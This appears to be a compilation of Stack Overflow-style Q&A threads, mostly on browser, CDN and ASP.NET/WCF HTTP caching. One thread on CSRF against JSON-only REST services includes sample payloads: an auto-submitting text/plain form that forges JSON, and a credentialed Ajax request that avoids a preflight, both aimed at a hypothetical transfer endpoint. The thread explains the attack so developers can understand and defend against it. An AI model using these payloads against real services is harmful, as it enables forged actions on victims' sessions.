I have a JavaScript app that sends requests to a REST API; the responses from the server carry cache headers (ETag, Cache-Control, Expires). Is caching of responses in the browser automatic, or must the app implement some mechanism to save the data?
An AJAX request is no different from a normal request: it's a GET/POST/HEAD/whatever request sent by the browser, and it is handled as such. This is confirmed here:
The HTTP and Cache sub-systems of modern browsers are at a much lower level than Ajax’s XMLHttpRequest object. At this level, the browser doesn’t know or care about Ajax requests. It simply obeys the normal HTTP caching rules based on the response headers returned from the server.
As per the jQuery documentation, caches can also be invalidated in at least one usual way (appending a query string):
cache (default: true, false for dataType 'script' and 'jsonp')
Type: Boolean
If set to false, it will force requested pages not to be cached by the browser. Note: Setting cache to false will only work correctly with HEAD and GET requests. It works by appending "_={timestamp}" to the GET parameters. The parameter is not needed for other types of requests, except in IE8 when a POST is made to a URL that has already been requested by a GET.
So in short, given the same headers, AJAX responses are cached the same way as other requests.
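For illustration, here is a minimal per-request sketch of the jQuery opt-out described above (the endpoint URL is hypothetical):
$.ajax({
    url: "/api/items",   // hypothetical endpoint
    type: "GET",
    cache: false,        // jQuery appends "_=<timestamp>" to the query string
    success: function (data) {
        console.log(data);
    }
});
The request that actually goes out looks like GET /api/items?_=1427412345678, so from the browser's point of view every call is a brand-new URL and the cache never matches.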
The browser handles caching of resources automatically. What you seem to be asking about is the actual response from the server.
You will need to set that up yourself in your application. You can do so on both the front end and the back end.
Most JS frameworks have cache control built in, for example:
jQuery
$.ajaxSetup({
// Disable caching of AJAX responses
cache: false
});
AngularJS
$http.defaults.cache = false;
etc.
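As a per-request alternative in AngularJS, a sketch (the endpoint is hypothetical):
// Opt in to caching for this one call only; responses are stored in
// $http's default cache, keyed by URL.
$http.get("/api/items", { cache: true }).then(function (response) {
    console.log(response.data);
});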
On the back end it really depends on what language you're using, your server engine, etc.
Check out Memcached, for example:
http://memcached.org/
As with anything in web development there are odd things here and there; for example, some IE versions automatically cache requests, and you have to add a unique id to the URL to prevent that.
From https://developer.mozilla.org/en-US/docs/AJAX/Getting_Started :
Note 2: If you do not set the Cache-Control: no-cache header, the browser will cache the response and never re-submit the request, making debugging "challenging." You can also append an always-different additional GET parameter, like a timestamp or a random number (see bypassing the cache).
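A minimal sketch of that second technique with a plain XMLHttpRequest (the endpoint is hypothetical):
var xhr = new XMLHttpRequest();
// Appending an always-different parameter gives every request a unique URL,
// so the browser's cache can never answer it.
xhr.open("GET", "/api/data?_=" + Date.now());  // hypothetical endpoint
xhr.onload = function () {
    console.log(xhr.responseText);
};
xhr.send();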
The browser should handle the cache automatically.
Check this article; JavaScript itself only exposes a way to clear cached data (via the Chrome extensions browsingData API):
https://developer.chrome.com/extensions/browsingData
If the server sends the response with any of the cache headers, browsers should respect them; there is no difference between static resources and AJAX requests.
You can also specify cache headers in your AJAX calls to bypass the cache and fetch the whole response from the server.
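For example, a sketch with the fetch API (the URL is hypothetical); the cache mode tells the browser to skip its HTTP cache entirely:
fetch("/api/data", { cache: "no-store" })  // bypass the cache completely
    .then(function (response) { return response.json(); })
    .then(function (data) { console.log(data); });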
Most modern browsers implement HTTP caching driven by the cache and expires headers:
http://www.arlocarreon.com/blog/http/http-requests-and-your-browsers-cache/
There are two aspects of an HTTP request that can qualify it for being cached:
- Specific HTTP cache and expires headers
- A unique URL
Interesting read:
http://www.mobify.com/blog/beginners-guide-to-http-cache-headers/
Related
I am trying to implement a REST web service with WCF that supports both caching and Conditional GETs.
I implemented basic caching following the instructions in MSDN: Caching Support for WCF Web HTTP Services. That means adding an [AspNetCacheProfile("MyOutputCacheProfile")] attribute to each of my web methods and adding appropriate entries to web.config. That seems to work correctly: cached responses are returned when identical arguments are passed to the web methods.
Then I added support for Conditional GET by calculating an ETag value and setting that on the response like this:
WebOperationContext.Current.OutgoingResponse.SetETag(myETag);
That sorta works: I can see the ETag header in the response the first time I call the web method.
But here's the problem: The next time I invoke that web method with the same arguments, a cached response is returned, and the cached response does not include the ETag header. (If I wait until cache expiration, or disable caching entirely, then the ETag headers are returned properly.)
So, is there any way to get the cached responses to include that ETag value?
Update: After some more study and experimentation, I find that doing this causes the ETag header to be included in all cached responses:
HttpContext.Current.Response.Cache.SetETag(myETag);
If I call that, then I don't need to call the associated WebOperationContext...SetETag() operation to make everything work.
Is this the Right Way to do this?
Correct me if I am wrong. RESTful services are closer to HTTP, and the HTTP spec says this about caching:
The goal of caching in HTTP/1.1 is to eliminate the need to send
requests in many cases, and to eliminate the need to send full
responses in many other cases. The former reduces the number of
network round-trips required for many operations; we use an
"expiration" mechanism for this purpose (see section 13.2). The latter
reduces network bandwidth requirements; we use a "validation"
mechanism for this purpose (see section 13.3).
ASP.NET output caching does not fall into either of these categories (neither expiration nor validation). The caching is done only on the web server: instead of executing the method, IIS sends back the stored response. Somehow it does not fit the RESTful model.
To implement caching properly, we should add Cache-Control and ETag headers to the response and then handle conditional GETs. Please consult this excellent article.
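For illustration, a sketch of the validation mechanism with hypothetical values. First request:
GET /api/orders/42 HTTP/1.1

HTTP/1.1 200 OK
Cache-Control: max-age=60
ETag: "v1"
...full body...
Revalidation, once the cached copy is stale:
GET /api/orders/42 HTTP/1.1
If-None-Match: "v1"

HTTP/1.1 304 Not Modified
The 304 has no body; the client keeps using its cached copy, which is exactly the bandwidth saving the spec describes.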
I am building a web service that exclusively uses JSON for its request and response content (i.e., no form encoded payloads).
Is a web service vulnerable to CSRF attack if the following are true?
1. Any POST request without a top-level JSON object, e.g., {"foo":"bar"}, will be rejected with a 400. For example, a POST request with the content 42 would be thus rejected.
2. Any POST request with a content-type other than application/json will be rejected with a 400. For example, a POST request with content-type application/x-www-form-urlencoded would be thus rejected.
3. All GET requests will be Safe, and thus not modify any server-side data.
4. Clients are authenticated via a session cookie, which the web service gives them after they provide a correct username/password pair via a POST with JSON data, e.g. {"username":"user#example.com", "password":"my password"}.
Ancillary question: Are PUT and DELETE requests ever vulnerable to CSRF? I ask because it seems that most (all?) browsers disallow these methods in HTML forms.
EDIT: Added item #4.
EDIT: Lots of good comments and answers so far, but no one has offered a specific CSRF attack to which this web service is vulnerable.
Forging arbitrary CSRF requests with arbitrary media types is effectively only possible with XHR, because a form’s method is limited to GET and POST and a form’s POST message body is also limited to the three formats application/x-www-form-urlencoded, multipart/form-data, and text/plain. However, with the form data encoding text/plain it is still possible to forge requests containing valid JSON data.
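A sketch of that text/plain trick (an attacker-hosted page; the target URL and field values are hypothetical):
<!-- text/plain encoding sends each field as name=value, so the "=" is
     hidden inside a JSON string to keep the body valid JSON. -->
<form action="https://victim.example/api/transfer" method="POST" enctype="text/plain">
  <input name='{"to":"attacker","amount":1000,"padding":"' value='"}'>
</form>
<script>document.forms[0].submit();</script>
The submitted body is {"to":"attacker","amount":1000,"padding":"="}, which is valid JSON — though it still arrives with Content-Type: text/plain, so a service that enforces application/json (point 2 above) would reject it.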
So the only threat comes from XHR-based CSRF attacks, and those will only be successful if they come from the same origin, so basically from your own site somehow (e.g. XSS). Be careful not to mistake disabling CORS (i.e. not setting Access-Control-Allow-Origin: *) for a protection: CORS simply prevents clients from reading the response. The whole request is still sent and processed by the server.
Yes, it is possible. You can set up an attacker server that sends the victim's browser a 307 redirect to the target server. You need to use Flash to send the POST instead of using a form.
Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1436241
It also works on Chrome.
It is possible to do CSRF on JSON-based RESTful services using Ajax. I tested this on an application (using both Chrome and Firefox).
You have to change the contentType to text/plain and the dataType to JSON in order to avoid a preflight request. Then you can send the request, but in order to send the session data (cookies), you need to set the withCredentials flag on your Ajax request.
I discuss this in more detail here (references are included):
http://wsecblog.blogspot.be/2016/03/csrf-with-json-post-via-ajax.html
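A minimal sketch of the request described above (the target URL and payload are hypothetical):
// contentType text/plain keeps this a "simple" CORS request, so no preflight;
// withCredentials makes the browser attach the victim's session cookie.
$.ajax({
    url: "https://victim.example/api/transfer",  // hypothetical target
    type: "POST",
    contentType: "text/plain",
    dataType: "json",
    data: JSON.stringify({ to: "attacker", amount: 1000 }),
    xhrFields: { withCredentials: true }
});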
I have some doubts concerning point 3. Although it can be considered safe, as it does not alter the data on the server side, the data can still be read, and the risk is that it can be stolen.
http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx/
Is a web service vulnerable to CSRF attack if the following are true?
Yes. It's still HTTP.
Are PUT and DELETE requests ever vulnerable to CSRF?
Yes
it seems that most (all?) browsers disallow these methods in HTML forms
Do you think that a browser is the only way to make an HTTP request?
My images are stored in Azure Blob Storage and referenced through my web application via my Azure CDN. However, all images return a 304 response. Ideally I don't want the browser to go back to the CDN to check validity on every request; I want the browser to always use the cache, at least for the lifetime of the cached image.
With my limited knowledge of caching, I understand that the cache uses the ETag value to check whether the version of the image is still the same when requested. In this case it is, and the CDN returns a 304 response. But because the Cache-Control header is set to public, max-age=2592000, I would hope the browser would use the cached copy of the image. I have another CDN setup with a hosted service endpoint which returns a 200 response, because there I remove the ETag value.
Any help with this would be greatly appreciated.
When ETag "triggers" 304 response => the browser has sent If-None-Match validating request to the server. This is normally done after max-age has elapsed. You could find a good description of this here:
https://stackoverflow.com/a/500103/2550808
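To illustrate with hypothetical values: given a response like
HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
ETag: "abc123"
the browser should serve the image from its local cache, without any request at all, for the full 30 days; only after that should it revalidate with If-None-Match: "abc123" and receive your 304.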
It is also worth mentioning that Firefox's cache settings should be left at their defaults: go to the about:config page and check this setting: http://kb.mozillazine.org/Browser.cache.check_doc_frequency
Going back to your question, something might be wrong with the Cache-Control header the server returns to the browser. In my modest personal experience I haven't encountered the explicitly public version of the header; more commonly it is just this:
Cache-Control: max-age=3600, must-revalidate
Anyway, here is pretty good description of headers pertaining to caching:
https://www.mnot.net/cache_docs/
Alternatively, there might be other reasons for incessant re-validation to consider:
- Vary headers in the server's 200 response for the file may affect caching;
- JavaScript calling reload on the location object with true for bReloadSource (i.e. location.reload(true)), which forces a fetch from the server.
Can anyone break down what these two methods do at the HTTP level?
We are dealing with Akamai edge caching and have been told that SetNoStore() will cause a cache exclusion so that (for example) form pages will always post back to the origin server. According to {guy}, this sets the HTTP header:
Cache-Control: "no-cache, no-store"
As I was implementing this change to our forms I found SetNoServerCaching(). Well that seems to make a bit more sense semantically, and the documentation says "Explicitly denies caching of the document on the origin-server."
So I went down to the sea sea sea to see what I could see see see. I tried both of these methods and reviewed the headers in Firebug and Fiddler.
And from what I can tell, both of these methods set the exact same HTTP header.
Can anyone explain whether there are actual differences between these methods, and if so, where they are hiding in the HTTP response?!
There are a few differences.
SetNoStore essentially stops the browser (and any network resource, such as a CDN) from saving any part of the response or request, including saving to temp files. This sets the no-store directive in the HTTP/1.1 Cache-Control header.
SetNoServerCaching essentially stops the server from caching the response. In ASP.NET there are several levels of caching that can happen: data only, partial requests, full pages, and SQL data. This call should stop the HTTP (full and partial) responses from being saved on the server. This method should not set the Cache-Control no-store or no-cache headers.
There is also
Response.Cache.SetCacheability(HttpCacheability.Public);  // emits Cache-Control: public
Response.Cache.SetMaxAge(new TimeSpan(1, 0, 0));           // emits max-age=3600 (one hour)
as a possible way of setting up caching; this produces a Cache-Control: public, max-age=3600 header (use Response.Cache.SetExpires if you also want an Expires header).
For a CDN you probably want to set an expiration header so that the CDN knows when to fetch new content if it gets a HIT. You probably don't want no-cache or no-store, as these would cause a refetch on every HIT, essentially nullifying any benefit the CDN brings you, except that it may have a faster backbone connection to the end user than your current ISP, and that would be marginal.
The difference between the two is:
HttpCachePolicy.SetNoStore() or Response.Cache.SetNoStore:
Prevents the browser from caching the ASPX page.
HttpCachePolicy.SetNoServerCaching or Response.Cache.SetNoServerCaching:
Stops all origin-server caching for the current response. Explicitly denies caching of the document on the origin-server. Once set, all requests for the document are fully processed.
When these methods are invoked, caching cannot be reenabled for the current response.
I'm currently working on a project that needs to request a URL multiple times. Having studied the traffic in an HTTP proxy (Charles), it seems that AIR will cache the first response and then return the same response for each subsequent request.
Does anybody know how to tell whether a response has been cached, other than setting useCache on the URLRequest? Even that doesn't say whether a given response came from the cache or not. The digest isn't set on the URLRequest either, although the docs mention that it's for swz files only, so how does AIR know whether its content is current? Are the response headers used to work out how long to hold the cache, i.e.
Cache-Control: max-age=900
Also, does anyone know how to flush/purge the cache, or are we at the whim of the GC? And in that case, how does it know whether to leave an item in the cache or not?
This makes sense to me, but still I would like to know how to regulate this cache.
Furthermore: I've tested a setup where ten parallel URLLoaders are created, all opening the same URL, to see what happens in that case. It seems that each parallel request goes to the network until a successful response arrives; all subsequent calls are then served from the cache. Calls that were already sent out before the successful response still complete. It looks like requests that are already in flight do not use the cache and return with correct data.
Additionally: the AIR runtime doesn't even send an "If-Modified-Since" header, so the cache isn't even honoring the HTTP protocol. It seems as if Adobe has implemented its own version of a cache which doesn't even use the HTTP/1.1 header field definitions. Perfect.
Thanks for any help.
Simon
From the documentation of the URLRequest class, it seems that AIR uses the operating system's HTTP cache. On Windows 7, it appears to use IE's cache.
You can use an HTTP monitoring tool like Fiddler to verify this.
The first request returns 200, and subsequent requests return 304. After clearing the IE cache and running the application again, you can see that the request once more results in an HTTP 200 status.